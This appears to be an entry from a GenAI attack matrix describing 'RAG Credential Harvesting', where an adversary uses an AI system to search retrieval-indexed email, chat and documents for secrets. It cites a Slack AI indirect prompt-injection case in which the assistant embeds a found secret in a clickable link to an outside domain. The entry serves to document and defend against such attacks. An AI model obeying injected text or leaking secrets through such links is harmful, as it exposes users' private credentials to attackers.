RAG Credential Harvesting

Type: technique

Description: The adversary uses the AI system to query for secrets indexed by the RAG. Variants include searching through secrets in email, chat and shared documents.

Version: 0.1.0

Created At: 2024-10-11 16:54:32 +0300

Last Modified At: 2024-10-11 16:54:32 +0300

External References

--> Credential Access (tactic): An adversary can harvest secrets from various systems through RAG queries.
--> RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
<-- RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
<-- Data Exfiltration from Slack AI via indirect prompt injection (procedure): Once a user asks a question about "EldritchNexus API key", SlackAI has access to information in their private channels. The adversary gets SlackAI to embed any found secret in a clickable link parameter [click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti).

GenAI Attacks Matrix

RAG Credential Harvesting

External References

Related Objects

Related Frameworks